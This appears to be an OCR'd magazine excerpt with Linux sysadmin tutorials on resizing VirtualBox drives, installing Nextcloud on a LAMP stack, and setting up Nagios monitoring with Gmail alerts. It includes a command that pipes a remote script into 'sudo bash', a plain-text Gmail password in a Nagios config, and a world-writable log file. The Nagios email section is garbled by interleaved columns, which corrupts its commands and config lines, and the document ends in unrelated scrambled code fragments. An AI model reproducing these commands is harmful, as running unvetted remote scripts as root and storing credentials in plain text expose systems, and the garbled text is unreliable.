Whether you plan to use VirtualBox from the command line or its GUI, you'll find it's packed with powerful and useful features that will convert you to the possibilities and power of virtualisation. You'll wonder how you ever coped before! ■

> Remove all the desktop paraphernalia and run your guest in a lean, distraction-free window using VBoxSDL.
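To give a flavour of the fully GUI-free route, here's a rough sketch of creating, booting and snapshotting a VM with VBoxManage alone. The names, sizes and file paths are illustrative rather than anything VirtualBox requires:
$ VBoxManage createvm --name "TestVM" --ostype Ubuntu_64 --register
$ VBoxManage modifyvm "TestVM" --memory 2048 --cpus 2
$ VBoxManage createmedium disk --filename TestVM.vdi --size 20000
$ VBoxManage storagectl "TestVM" --name "SATA" --add sata
$ VBoxManage storageattach "TestVM" --storagectl "SATA" --port 0 --device 0 --type hdd --medium TestVM.vdi
$ VBoxManage storageattach "TestVM" --storagectl "SATA" --port 1 --device 0 --type dvddrive --medium ubuntu.iso
$ VBoxManage startvm "TestVM"
$ VBoxManage snapshot "TestVM" take "clean-install"
Run VBoxManage list vms to check what's registered, and VBoxManage list ostypes to find the right --ostype identifier for your guest.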

Extend the size of your VM drive

1 Consolidate snapshots
If your VM contains snapshots, the resizing process will affect only the original base image. To resolve this, right-click the VM and choose Settings, then append -old on to the end of its name. Click 'OK', right-click the VM again, but this time choose Clone. Click 'Expert Mode', then rename it and verify that 'Full Clone' and 'Current machine state' are selected before clicking 'Clone'.

2 Resize virtual drive
Close VirtualBox, open Terminal and navigate to the folder containing your VDI file. Now type the following command, replacing drivename.vdi with the filename of your particular VDI file:
VBoxManage modifyhd "drivename.vdi" --resize 10000
The resize figure is in MB, so 10000 equals 10,000MB or 10GB.

3 Extend partition
The drive concerned has been resized, but you'll now need to repartition it. Boot your VM having attached an ISO of the Gparted Live CD and then use that to move partitions around to use the extra space - you may have to resize the extended partition first, then move the swap volume to the end before resizing the partition from the left to make the space available.
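It's worth confirming the new capacity before you boot back into the guest. A quick check, using the same example filename:
$ VBoxManage showhdinfo "drivename.vdi"
The Capacity line in the output should now report the figure you passed to --resize.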



Software

Nextcloud:
Share your files
Remote storage silos are a dime a dozen, but be wary of their privacy
policies. We explain how to set up your own and keep control.
Online storage services such as Dropbox offer a convenient option for accessing and sharing data anywhere on the planet. Yet the convenience comes at a cost, and the very idea of transferring our files to a remote server, outside of our jurisdiction, seems rather strange in the post-Snowden era. This is where Nextcloud steps in. It offers all the conveniences of an omnipresent storage service while keeping you in charge of your private data. The open source data sharing server is brimming with features for both home and large-scale enterprise users. With Nextcloud you can store, sync and share not just your data but your contacts and calendars. It also boasts advanced features such as single sign-on capability, theming for custom branding, custom password policy, secure WebRTC conferencing, Collabora Online Office integration and more. If that's not enough, in addition to the core functions you also get a host of additional useful add-ons.

> Unlike its progenitor, there is only one open source version of Nextcloud and the developers plan to generate revenue via support and consulting services.

Quick tip: You can install Nextcloud on Ubuntu Server simply with sudo snap install nextcloud. This however robs you of all the custom configuration options available during a manual install.

Paint the sky
You'll have to lay the foundation before you can install Nextcloud. We'll setup Nextcloud on top of an Ubuntu Server 16.10 installation and begin by making sure our installation is up to date with sudo apt update && sudo apt upgrade.

We'll then fetch and install the individual components that make up the popular LAMP stack. First up is the Apache web server, which can be installed with sudo apt install apache2 apache2-utils. Next up is MariaDB, which is a drop-in replacement for MySQL. Install it with sudo apt install mariadb-server mariadb-client. Straight after it's installed, run MariaDB's post installation security script with sudo mysql_secure_installation. The script takes you through a small command-line wizard to help you setup a password for the database server's root user and setup some other defaults to harden the database installation.

Then comes PHP, which you can fetch along with all the required modules with sudo apt install php libapache2-mod-php php-fpm php-cli php-json php-curl php-imap php-gd php-mysql php-xml php-zip php-intl php-mcrypt php-imagick php-mbstring. By default PHP has defined very conservative limits which will prevent you from uploading large files into your Nextcloud server. The following commands will increase the PHP memory limit to 512MB, and take the upload and individual post size to 250MB:
$ sed -i "s/memory_limit = .*/memory_limit = 512M/" /etc/php/7.0/fpm/php.ini
$ sed -i "s/upload_max_filesize = .*/upload_max_filesize = 250M/" /etc/php/7.0/fpm/php.ini
$ sed -i "s/post_max_size = .*/post_max_size = 250M/" /etc/php/7.0/fpm/php.ini
Lastly, ensure that the PHP module is loaded in Apache with sudo a2enmod php7.0 before you restart the web server with sudo systemctl restart apache2.

Next we'll create a database and a Nextcloud user in MariaDB. Log into the MariaDB database server with the following command:
$ mysql -u root -p
After authenticating with the password you specified while securing MariaDB, you can create a database named nextcloud with:
> create database nextcloud;
Similarly, you can create a user for administering this database with:
> create user nextcloudadmin@localhost identified by 'a-password';
Remember to replace a-password with your preferred password. Finally grant this user all the privileges on the freshly minted Nextcloud database with:
> grant all privileges on nextcloud.* to nextcloudadmin@localhost identified by 'a-password';
Bring the changes into effect and exit the MySQL prompt:
> flush privileges;
> exit;
We'll also enable the binary log for MariaDB, which will contain a record of all the changes to the database. Open MariaDB's configuration file in a text editor with sudo nano /etc/mysql/mariadb.conf.d/50-server.cnf and enter the following lines under the [mysqld] section:
log-bin = /var/log/mysql/mariadb-bin
log-bin-index = /var/log/mysql/mariadb-bin.index
binlog_format = mixed

Cloud control
In the main tutorial we've looked at setting up and using a default Nextcloud instance. But as the admin you can tinker with several settings to acclimatise Nextcloud as per your requirements. To access these settings, roll-down the menu next to your username and select the Admin option. This takes you to a page that lists several settings that affect the entire Nextcloud installation, grouped under various different heads such as Server settings, Server info, Usage report and more. The Server info option is different from the others in that instead of helping you tweak any settings it only visualises various details about the Nextcloud server, such as the load on the CPU, memory usage, and more.

Head to the Sharing section to configure the policy for sharing files on the server. Here you can toggle options to force users to set a password on all public shares, set a default expiry date for all public shares, restrict members to sharing files only with other users in their group, and more. You can configure the Nextcloud server to send out emails for various types of notifications and password resets from the Additional settings section. This page also lets you define a password policy by forcing the minimal length, the use of mixed cases, numeric and special characters.

Save and close the file when you're done. Then reload the MariaDB service with sudo systemctl reload mysql.

Similarly, you'll also have to make some tweaks to the Apache web server. Nextcloud needs several modules to function correctly. Enable them with the a2enmod rewrite and a2enmod headers commands.

Also, while you can use Nextcloud over plain HTTP, the Nextcloud developers strongly encourage the use of SSL/TLS to encrypt all server traffic, and to protect users' logins and data in transit. Apache installed under Ubuntu already comes equipped with a simple self-signed certificate. All you have to do is to enable the SSL module and the default site and accept the use of the self-signed certificate:
$ a2enmod ssl
$ a2ensite default-ssl
When you are done, restart the Apache server to load the modules with sudo systemctl restart apache2.

Quick tip: You can backup your entire Nextcloud install to a remote location with something as simple as rsync -Aax /var/www/nextcloud/ nextcloud-dir-backup_$(date +"%d%m%Y")/.

In the clouds
Now that we've laid the groundwork for Nextcloud, let's fetch and install the server. Head to www.nextcloud.com/install and grab the latest version, which is v10.0.1 at present:
$ wget -c https://download.nextcloud.com/server/releases/nextcloud-10.0.1.tar.bz2
$ tar xvf nextcloud-10.0.1.tar.bz2
Deflating the archive will create a new directory named nextcloud in the current working directory. Copy the new directory and all of its content to the document root of the Apache server with sudo cp -r nextcloud /var/www/. Then hand over the control of the directory to the Apache user (www-data) with sudo chown www-data:www-data /var/www/nextcloud/ -R.

We'll install and access Nextcloud from under its own directory by creating a configuration file with sudo nano /etc/apache2/sites-available/nextcloud.conf and the following:

Alias /nextcloud /var/www/nextcloud/

<Directory /var/www/nextcloud/>
  Options +FollowSymlinks
  AllowOverride All

  <IfModule mod_dav.c>
    Dav off
  </IfModule>

  SetEnv HOME /var/www/nextcloud
  SetEnv HTTP_HOME /var/www/nextcloud

</Directory>

Save the file and bring Nextcloud online with:
$ sudo ln -s /etc/apache2/sites-available/nextcloud.conf /etc/apache2/sites-enabled/nextcloud.conf
That's the command-line stuff taken care of. Now fire up a web browser on any computer on the network and head to https://192.168.3.106/nextcloud. Replace 192.168.3.106 with the IP address or domain name of the server you've deployed Nextcloud on.

Since this is the first time you're interacting with Nextcloud, you'll be asked to create an admin account. Enter the username and password for the Nextcloud administrator in the space provided. Then scroll down and expand the Storage & database pull-down menu to reveal more options. The data folder is where Nextcloud will house the files shared by the users. Although it'll already be populated with a location, for security reasons the Nextcloud developers advise that it's better to place the data directory outside the Nextcloud root directory, such as /var/www/data.

You're next prompted for several details about the database server. By default Nextcloud uses the SQLite database, which is adequate for smaller installations. However, we've already setup the industry-standard MariaDB, which can handle all sorts of loads. Use the textboxes to enter the username and password for the user we created earlier to manage the nextcloud database. Then press the Finish setup button to let Nextcloud connect to the database and create the appropriate structure for the Nextcloud installation.

That's it, your Nextcloud server is up and running. You'll now be taken to Nextcloud's dashboard. While you can start using the server to upload and download files straight away, let's take a moment to get the house in order.

For starters, roll-down the menu next to your username in the top-right corner and click the Personal link. Here you can review and change several settings for your account, such as the password and display name. It also lists the groups you are part of. If your Nextcloud deployment is going to be used by multiple people, it's advisable to organise users into different groups. To do this, select the Users option from the pull-down menu. You can then use the forms on the page to create groups and users. While adding users, you can also restrict their storage space and even mark certain users as administrators of particular groups.

You're now all set to upload data into your Nextcloud server. After you've logged in, you are dropped in the Files section. The interface is very intuitive and straightforward. To upload a file, click on the + button and choose Upload from the drop-down menu. To organise files into folders, click on the + button and select the Folder option. If you've uploaded a file in a format that Nextcloud understands, you can click on its name to view and edit the file. Nextcloud can visualise the data it houses in different views. For example, click on the Files pull-down menu in the top-left corner of the interface, and select the Gallery option. This view helps you view images in your cloud by filtering out all other types of content.

Another way to upload files to the server is by using the WebDAV protocol, with which you can access your cloud server from your file manager. If you use Ubuntu, launch the Files file manager and press Ctrl+L to enable the location area. Here you can point to your Nextcloud server, such as dav://192.168.3.106/nextcloud/remote.php/webdav. Once authenticated, the Nextcloud storage is mounted and you can interact with it just like a regular folder.

To share uploaded files, go to the Files section in the web interface and click the Share button to the right of the filename. This will bring up a flap where you can specify the users and groups you want to share the file with, along with other options such as whether you want to give them permission to modify or further share the file. You can also share with someone who isn't registered with your Nextcloud server. Simply toggle the Share link checkbox and Nextcloud will display a link to the item that you can share with anybody on the internet. You can also password-protect the link and set an expiration date.

While you can interact with the cloud using the web interface, it's far easier to use one of its official clients.

> Nextcloud hosts clients for Windows and Mac OS X on its website (https://nextcloud.com/install/#install-clients) while mobile clients are best fetched from either Apple's App Store, Google's Play Store or the F-Droid repository.

Nextcloud has clients for all the major desktop and mobile platforms. These clients also help you synchronise folders from the desktop to your Nextcloud server with ease. Many Linux distributions such as Arch Linux and OpenSUSE Tumbleweed include the Nextcloud Linux client in their official repos. If your distribution doesn't have the Nextcloud client in its repositories, you can either compile the official client from source or download and use the client for ownCloud. The ownCloud client is available in the repositories of virtually all the popular distributions, including Ubuntu.

Once the client is installed, it prompts you for your login credentials in order to connect to the Nextcloud installation. After establishing the connection, use the client to create a local sync folder under your home directory, such as /home/bodhi/Nextcloud. Any files you move into this directory will automatically be synced to the server. The client's connection wizard also asks you whether you'd like to sync everything from the connected Nextcloud installation or selectively sync files. After running through the client's wizard, you can access it from your desktop's notification area.

When collaborating with other users, you'll appreciate Nextcloud's version control system, which creates backups of files before modifying them. These backups are accessible through the Versions pull-down option corresponding to each file, along with a 'Restore' button to revert to an older version.

In addition to files, you can also sync your calendar and address book with your Nextcloud server. Follow the walkthrough to enable the Calendar and Contacts applications. Once you've enabled both programs, the top-left pull-down menu will include the Calendar and Contacts options. Before proceeding further, you need to import your contacts and calendar from your existing app into your cloud server. Nextcloud supports the popular vCard (.vcf) file format, and almost every popular email application, including online ones such as Gmail, lets you export its address book in this format. Similarly, calendars can be imported in the popular iCal format. Explore your existing mail and calendaring apps and export the VCF and iCal files for your account before moving on.

In Nextcloud Contacts, click on the gears icon. Select Import from the options that are revealed and point to the exported VCF file. The import process might take some time with a large address book. You can sync these contacts with your desktop and mobile email apps using CardDAV. You can similarly import an existing calendar by clicking on the gears icon inside the Calendar app. Here again, click on the Import calendar button and point to the exported iCal file.

We've just scratched the surface of what you can do with Nextcloud. Follow the walkthrough to flesh out the default installation with new applications that will extend the functionality of your personal cloud. ■
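The WebDAV access described above isn't limited to desktop file managers: with the davfs2 package (available in Ubuntu's repos) you can mount your Nextcloud storage like any other filesystem. A quick sketch using the example server address from this tutorial:
$ sudo apt install davfs2
$ sudo mkdir -p /mnt/nextcloud
$ sudo mount -t davfs https://192.168.3.106/nextcloud/remote.php/webdav/ /mnt/nextcloud
You'll be prompted for your Nextcloud username and password; add matching entries to /etc/fstab and /etc/davfs2/secrets if you want the mount to come up automatically.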

Be omnipresent
The real advantage of commercial cloud services, such as Dropbox, is that you can access data stored within them from any computer connected to the internet. However, by default, your Nextcloud storage server will only be accessible from computers within the network it's set up on. But that's not to say that you can't access it from the internet. Either get a static IP or use a dynamic DNS service and then poke holes in your router's firewall to allow traffic from the internet. The smarter way is to use a tunnelling service such as PageKite. It uses a Python script to reverse tunnel from your computer to a subdomain.pagekite.me address. The service uses a pay-what-you-want model. The minimum payment of $4 (about £3.00) gets you 2GB of transfer quota for a month. Pay more to get more bandwidth for a longer duration and the ability to create additional .pagekite addresses.

To use PageKite, fire up a terminal and install the PageKite software with:
$ curl -s https://pagekite.net/pk/ | sudo bash
Now assuming your storage server is running on port 80, put it on the internet with
$ pagekite.py 80 mynextcloudserver.pagekite.me
That's it. Your private server is now publicly accessible on https://mynextcloudserver.pagekite.me. Remember to replace mynextcloudserver with your own name.


Install additional apps

1 Application repository
You can extend your default Nextcloud install by adding applications. Bring up the pull-down menu in the top-left of the interface and select the option labelled Apps. By default, you are shown a list of apps that are already enabled on your installation. You can browse through this list and read their descriptions to better understand their functionality. You can also disable any enabled app from this section.

2 Calendar and Contacts
These two should be the first applications you enable. You'll find them listed under the Productivity category. Once enabled, you can use the app's intuitive interface to add dates, contacts and other details. The apps allow you to pull in your existing contacts and calendars, which you can then sync with any PIM applications using industry standard formats and protocols (as explained in the tutorial).

3 External storage
If you use popular public storage services like Dropbox and Google Drive, you can connect and manage them from Nextcloud with the External storage support app. Once enabled, the app creates room for itself in the Admin section of the installation. Use the Add storage pull-down menu to select a supported service and enter the authentication details in the space provided.

4 File access control
If your Nextcloud install will serve several users, it'll be a good idea to enable the File access control app. This app is also configurable via the Admin section, from where you can define various access control rules on parameters such as IP address, file size and more. The rules are tagged to a group of users on the Nextcloud deployment and access is granted only if the attached rules hold true.

5 Bookmark manager
An app that you should enable is Bookmarks. This enables you to store and manage bookmarks in your Nextcloud server. Launch the app to store bookmarks directly, or import them from a bookmark file from your web browser. The app also has a bookmarklet that you can add to your browser's bookmarks bar. Press the bookmarklet to add a website to Nextcloud's list of bookmarks.

6 Automatically tag files
For better organisation, you can use the Files automated tagging app, which will assign tags to files on its own based on some condition, as soon as they are uploaded. You can define rule groups for assigning tags in the Workflow section of the Admin section using several different criteria. When a file is uploaded, Nextcloud will compare it with the defined rules and will tag the file if a matching rule is found.



Software

Nagios: Monitor
your PC realm
Keep an eye on your network from the comforts of your armchair and the
power of an industrial-level monitoring solution.

Administering a network is an involved task, but it needn't be cumbersome. Wouldn't it be great if all of us could manage our networks from the comforts of an armchair just like the Architect in The Matrix? This might seem like a pipe dream to any admin who's handled calls from the helpdesk at 3:00 am and diagnosed the mail server across the continent in the dead of the night. While it doesn't take much effort to keep an eye on a small network, monitoring and troubleshooting a geographically dispersed network is a complicated and time consuming endeavour.

Nagios is one of the most popular and extensively used network monitoring tools, and you can use it to streamline the management and monitoring of your network. You can use it to monitor just about all devices and services that have an address and can be contacted via TCP/IP. The tool can monitor a variety of attributes ranging from operating system parameters such as CPU, disk, and memory usage to the status of applications, files, and databases.

Deploy big brother
Installing Nagios is an involved but rather straightforward process. It's made marginally more complicated by the fact that the latest version of Nagios isn't yet available in the Ubuntu Server repositories. So you'll just grab the tarball for the latest release from its website and compile it on your own.

Begin by installing all its dependencies with sudo apt install build-essential wget unzip openssl libssl-dev libgd2-xpm-dev xinetd apache2 php apache2-utils libapache2-mod-php7.0 php-gd. Then create a user and group for administering Nagios, since it isn't a good idea to run server software with superuser privileges:
$ useradd nagios
$ groupadd nagcmd
Now add the Nagios user and the Apache user, www-data, to the nagcmd group in order to run commands on Nagios through the web interface:
$ usermod -a -G nagcmd nagios
$ usermod -a -G nagcmd www-data
That sets up the build environment for Nagios. Head to the Nagios Core download page (https://www.nagios.org/downloads/core-stay-informed/) and click the Skip to download page link if you don't want to sign up to receive emails about new updates. From this page, copy the download link to the latest release and then fetch and extract it on the terminal:
$ wget -c https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.2.1.tar.gz
$ tar xvf nagios-4.2.1.tar.gz
$ cd nagios-4.2.1/
You can now compile Nagios with ./configure --with-nagios-group=nagios --with-command-group=nagcmd followed by make all, and finally install the main application along with all the files and scripts for the administration interface with sudo make install. To help ease the configuration, type sudo make install-config to install the sample config files under the /usr/local/nagios/etc directory. In the same vein, type sudo make install-commandmode to set the correct permissions on the external command directory. You can type make without any arguments for a list of all available options. For example, there's sudo make install-init to install the Nagios init scripts. However, since Ubuntu now uses Systemd we'll have to manually create a service file with sudo nano /etc/systemd/system/nagios.service with the following content:
[Unit]
Description=Nagios
BindsTo=network.target

[Install]
WantedBy=multi-user.target

[Service]
User=nagios
Group=nagios
Type=simple
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg
Save the file and then enable the service with:
$ sudo systemctl enable /etc/systemd/system/nagios.service
$ sudo systemctl start nagios
The Nagios server is now up and running.

Quick tip: After making changes to any aspect of the Nagios server, make it a habit to check the configuration with sudo /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg.

Plugin services
The Nagios server has an extensive plugin architecture that you can use to monitor services like DHCP, FTP, HTTP and more. Just like the monitoring server itself, to install the Nagios Plugins, go to its downloads page (https://nagios-plugins.org/downloads/) and copy the download link for the current stable release:
$ wget -c http://www.nagios-plugins.org/download/nagios-plugins-2.1.3.tar.gz
$ tar xvf nagios-plugins-2.1.3.tar.gz

Change into the newly created directory, then configure, compile, and install the plugins with:
$ cd nagios-plugins-2.1.3/
$ ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl
$ make
$ sudo make install
Before moving further, you should tweak the default Nagios configuration to specify the directory that'll house the configuration for the other computers in the network you want Nagios to monitor.

Open the main Nagios configuration file with sudo nano /usr/local/nagios/etc/nagios.cfg, scroll down and remove the # symbol to uncomment the following line:
cfg_dir=/usr/local/nagios/etc/servers
Save and exit the file and then create the specified directory with sudo mkdir /usr/local/nagios/etc/servers. You should also take a moment to specify an email address for Nagios to send notifications to whenever it picks up an issue with one of the computers it's monitoring. While this is purely optional, it's a natural extension of having a monitoring server. But for this to work you'll need a functional email server as well, which is a project in itself. However, later in the tutorial we'll use a nifty little script that'll let Nagios send notifications via Gmail, which should work nicely for smaller networks. For now, open the contacts.cfg file with sudo nano /usr/local/nagios/etc/objects/contacts.cfg and replace the default email with your email address.

> Always remember to check the Nagios configuration, which looks at the definitions for all components including all hosts and services, before committing the changes by restarting the server.

Dash to the dashboard
The final aspect of the setup process is configuring the environment for the web-based administration dashboard. Begin by enabling the rewrite and CGI Apache modules with sudo a2enmod rewrite && sudo a2enmod cgi.

Now setup Nagios as a virtual host inside Apache by copying over the sample configuration file with sudo cp sample-config/httpd.conf /etc/apache2/sites-available/nagios4.conf. Give it the right access permissions with sudo chmod 644 /etc/apache2/sites-available/nagios4.conf before enabling the new virtual host using sudo a2ensite nagios4.conf. You should also create the authentication details to log in to the administration interface. The command sudo htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin creates a user named nagiosadmin and prompts you to setup its password. That's all there is to it. Now restart Apache and the Nagios service:
$ sudo service apache2 restart
$ sudo systemctl start nagios
Then fire up a web browser on any computer on the network and access the administration interface by appending /nagios to the domain name or IP address of the computer you've setup Nagios on. Assuming the address of the Nagios server is 192.168.3.104, you can access the Nagios administration interface at 192.168.3.104/nagios. You'll be prompted for the login credentials of the Nagios admin that you've just created.

After authentication you'll be taken to the Nagios administration console, which is loaded with information. It might look daunting at first but it presents all information in a logical manner and is very intuitive to operate. For starters, head to the Hosts link in the navigation bar on the left. Even though you haven't configured any hosts for monitoring yet, by default the page will list one machine: the localhost on which Nagios is installed and running.

Open for business
The client computers you wish to monitor are known as hosts in Nagios parlance. To add a host, shift over to that computer (either physically or via SSH) and install Nagios Plugins and NRPE with sudo apt install nagios-plugins nagios-nrpe-server. NRPE is the Nagios Remote Plugin Executor, which allows you to remotely execute the Nagios plugins on other Linux machines so that you can monitor various metrics on these machines, such as disk space, CPU load and more.

Monitor Windows hosts


If your network has Windows machines in addition to Linux hosts, you can use Nagios to monitor various services and attributes running atop these as well. Before you can monitor a Windows machine, edit the main Nagios core config file with sudo nano /usr/local/nagios/etc/nagios.cfg and uncomment the following line:
cfg_file=/usr/local/nagios/etc/objects/windows.cfg
This tells Nagios to look for object definitions for Windows hosts in this file. Now head to www.nsclient.org and download the latest version of the Windows monitoring client. Double-click the downloaded executable file and run through the setup to install it. On some Windows installations, you'll have to head to Control Panel > Administrative Tools > Services and double-click on the NSClient service to edit its settings. Switch to the Log On tab and toggle the 'Allow service to interact with desktop' checkbox.

When the service is setup on the Windows machine, switch to the computer running Nagios to define the Windows host inside the servers directory:
$ sudo nano /usr/local/nagios/etc/servers/win10_host.cfg

define host {
use windows-server
host_name win10_host
alias Windows 10 Box
address 192.168.3.107
}

define service {
use generic-service
host_name win10_host
service_description Uptime
check_command check_nt!UPTIME
}

define service {
use generic-service
host_name win10_host
service_description CPU Load
check_command check_nt!CPULOAD!-l 5,80,90
}
These definitions set the location of the Windows host in the network as well as define the uptime and CPU load services.
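More check_nt variables can be monitored in exactly the same way. As a sketch, here's what a memory usage service could look like, warning at 80 per cent use and going critical at 90 per cent - the thresholds are just examples to adjust:
define service {
use generic-service
host_name win10_host
service_description Memory Usage
check_command check_nt!MEMUSE!-w 80 -c 90
}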

Once it's been installed, you'll have to tweak the NRPE configuration file to acclimatise it to your network. Open the file in a text editor using sudo nano /etc/nagios/nrpe.cfg, find the server_address directive and add the IP address of this host, such as server_address=192.168.3.100. Scroll further down the file to the allowed_hosts directive, and add the IP address of your Nagios server to the comma-delimited list, such as allowed_hosts=127.0.0.1,192.168.3.104. This configures NRPE to accept requests from your Nagios server.

Next up, we'll specify the filesystem in this configuration file to enable Nagios to monitor the disk usage. You can find the location of your root filesystem with the df -h / command in a new terminal window. Assuming it's /dev/sda8, scroll down the nrpe.cfg file and look for the command[check_hda1] directive and make sure it points to your root filesystem, such as:
command[check_hda1]=/usr/lib/nagios/plugins/check_disk -w 20% -c 10% -p /dev/sda8
Save the file and bring the changes into effect by restarting NRPE with sudo service nagios-nrpe-server restart.

Once you are done installing and configuring NRPE on the host that you want to monitor, you will have to add the host to your Nagios server configuration before it will start monitoring it. On the Nagios server, create a new configuration file for each of the remote hosts that you want to monitor under the /servers directory created earlier, such as:
$ sudo vi /usr/local/nagios/etc/servers/ubuntu_host.cfg
In this file, you need to define various aspects of the host, such as:
define host {
use linux-server
host_name ubuntu_host
alias Ubuntu 16.10 Host
address 192.168.3.100
check_period 24x7
notification_interval 30
notification_period 24x7
contact_groups admins
}
Here we've specified the name and address of the host along with other aspects such as the time to wait before sending out notifications (30 minutes), the period in which the host is monitored (24 hours) and the contact group that'll be notified whenever there are problems with this host. The Nagios docs (http://bit.ly/LXFnagios) describe the various aspects that you can define while setting up a host.

With the configuration file above, Nagios will only monitor whether the host is up or down. You'll have to manually add in blocks of code for other services you wish to monitor. So for example, here's how you ping the host at regular intervals:
define service {
use generic-service
host_name ubuntu_host
service_description PING
check_command check_ping!100.0,20%!500.0,60%
}
Similarly, here's how you check on the disks:
define service {
use generic-service
host_name ubuntu_host
service_description Root Partition
check_command check_local_disk!20%!10%!/
check_period 24x7
check_freshness 1
contact_groups admins
notification_interval 2
notification_period 24x7
notifications_enabled 1
}
The above service definition block will check the disk space of the root partition on the machine and send a Warning alert when the free space is less than 20% and a Critical alert when the free space goes below 10%. Take a look at the definitions in the /usr/local/nagios/etc/objects/localhost.cfg file for other definitions for monitoring the host and adapt them as per your requirements.

When you're done defining the host and the services you want to monitor, save the file and reload the Nagios configuration with sudo service nagios reload.

It might take a couple of seconds for Nagios to connect with the host. Fire up the browser and bring up the Nagios administration interface. When you now click on the Hosts link, the page will list the newly added ubuntu_host along with localhost. It'll also display the current status of the host and you can click on it for further details.

There are various ways you can check up on the configured services for the host. Click on the Services link in the navigation menu on the left to view a list of all services configured on all the added hosts along with their current status and a brief one-line description. Click on the name of a service for a detailed report on that particular service under a particular host.

Repeat this section for every Linux computer in your network that you want to monitor with Nagios. Refer to the Monitor Windows hosts box if you wish to keep an eye on the Windows machines in your network as well.

> Use the Tactical Overview option to view a one-page summary of the current status of the monitored hosts and services and the Nagios Core server itself.

Quick tip: It's a good idea to replace the default Nagios home page with the Tactical Overview page. To do this, edit the /usr/local/nagios/share/index.php file and point $url to '/nagios/cgi-bin/tac.cgi';

Receive notifications
While Nagios automatically keeps an eye on all the hosts you've given it access to, you'll have to head to the administration dashboard to pick up any errors. A better option is to let the monitoring server send you notifications whenever a computer or service in your network isn't functioning properly and requires attention. Nagios can, for example, send you an email when disk utilisation crosses a certain threshold or a critical service like Samba is down.

Usually this requires setting up a dedicated mail server, which could be a costly and time consuming affair. If you don't mind relying on a public email service, you can use the sendEmail script to ask Nagios to email you notifications using a freely available service like Gmail.

92 | The Hacker's Manual


Nagios

Reusable configuration
One of the best features in Nagios is known as manageable, network admins can reuse notifications. The generic-service template
object inheritance. Nagios makes it pretty configuration for pretty much the same works similarly but for individual services rather
straightforward to monitor a large number of advantages. than hosts. The default values defined in the
hosts and services thanks to its ability to use The use keyword in the host and service template file however can be overridden in the
templates that come in handy while setting definition files points to the templates from individual host definition file.
them up. Thanks to templates you can define which the files will inherit objects. The linux- The check_command keyword is also similar
the default values for the host and services server and generic-service templates used in the in function to the use keyword. It points to the
inside a single file rather than having to retype example definitions in the tutorial are defined in commands that are defined in the /usr/local/
them constantly. the/usr/local/nagios/etc/objects/ nagios/etc/objects/commands.cfg file. This
Just like programmers reuse code to templates.cfg file. The linux-server template file contains all the commands for checking
streamline their code and make it more sets defaults for aspects like event handling and various services, such as DHCP. SSH and more.

sendEmail script to ask Nagios to email you notifications actual email address, login id and password for the sender
using a freely available service like Gmail. along with the recipient's email address. If all goes well, the
As usual, first fetch the components the script relies on script will send an email from the sender's email account to
with sudo apt install libio-socket-ssl-perl libnet-ssleay-perl the recipient's email address.
perl. Once these are installed, fetch the script and extract it: Once you've tested the script, you'll need to configure
$ wget http://caspian.dotconf.net/menu/Software/SendEmail/ Nagios to use it to send notification emails via an external
sendEmail-vl .56.tar.gz SMTP server. First up. add the details about Gmail’s SMTP
$ tar xvf sendEmail-vl.56.tar.gz server in the resource.cfg file:
Now change into the extracted folder and copy over the $ sudo nano /usr/local/nagios/etc/resource.cfg
sendEmail script to the folder that houses all the executables
and make it one as well: $USER5$=youremail@gmail.com
$sudocp sendEmail*vl.56/sendEmail /usr/local/bin $USER7$=smtp.gmail.com:587
$ sudo chmod +x /usr/local/bin/sendEmail $USER9$=senders-login-id
It's also a good idea to create a log file for the script to $USER10$=senders-password
write any errors into:
$ touch /var/log/sendEmail Save the file and then edit the command.cfg file and
$ chmod 666 /var/log/sendEmail replace the 'notify-host-by-email' and ‘notify-service-by-email’
If the emails don’t show up in your inbox after you’ve run lines to read:
through this tutorial, check this log file for details with tail -f / # ‘notify-host-by-email’ command definition
var/log/sendEmail. define command{
Note that Gmail has dropped support for SSLv3, so you'll command_name notify-host-by-email
have to tweak the script to get it to work. Open /usr/local/ commandJine /usr/bin/printf “%b” “***“ Notification
bin/sendEmail in a text editor and jump down to line 1906. from Nagios ***** \n\n Notification Type:
Here drop the SSLv3 bit and change the SSLv3 TLSvl line $NOTIFICATIONTYPE$\n Host: $H0STNAME$\n State:
to only read TLSvl. Now save and close the file. $H0STSTATE$\n Address: $HOSTADDRESS$\n Info:
You can now test the script by sending an email from the $H0ST0UTPUT$
CLI in the following format: }
$ sendEmail -v -f [senders-email@gmail.com] -s smtp.gmail.
com:587 -xu [senders-login-id] -xp [Password-for-senders- # ‘notify-service-by-email’ command definition
login] -t [recipient-email-address@gmail.com] -o tls=yes -u define command{
Test email from CLI -m “This really works, eh?l?” command_name notify-service-by-email
Replace the text marked by the [square brackets] with the commandJine /usr/bin/printf “%b” “**“* Notification
from Nagios ***** \n\n Notification Type:
$NOTIFICATIONTYPE$\n Service: $SERVICEDESC$\n
Host: $HOSTALIAS$\n Address: $HOSTADDRESS$\n State:
$SE$
}
Here we've defined the template for the notifications
that'll be sent out for both the host as well as the service.
Double check them before putting them into use by restarting
Nagios with service nagios restart 0.
That's it. If any of the hosts or services within them
misbehave. Nagios will automatically alert you by sending a
notification to the email address specified in the contacts,
cfg file earlier. Your monitoring server is now all set. You can
add more hosts and expand the services it monitors following
the relevant sections of the tutorial. Now put your feet up and
> Use the Map option from the navigation menu on the left sip on that pina colada while Nagios herds your network on
to visualise the hosts on your network. your behalf. ■

The Hacker's Manual | 93


M ACKER’S
‘hash $ i
son । ren

B^B ^vB B.B ^B^^k ■


I
I■■I B fl B BH v B B_ fl B B B B___ t

I I fl fl B I
aprocessable_entity} emigrate $ bundle exec rake db:migrate $
flB^^BB flipp^flik <^pi^Bflfl|
^^B ^^B ^^B

fl Bbhbi B MH
.html B B B B^lse
tec rails generate migration add_priority_to_tasks priorityinteger $ bundle exec rake db:migrate S bundle exec rake dbrmigrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = py
ars = for i in range(MAX_STARS): star = [randrange(0,639), randrange(O,479), randrange(l, 16)] stars.append(star) while True: clocktick(30) for event in pygame.
Inumstars = 100; use Time::HiRes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for (Si = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $s
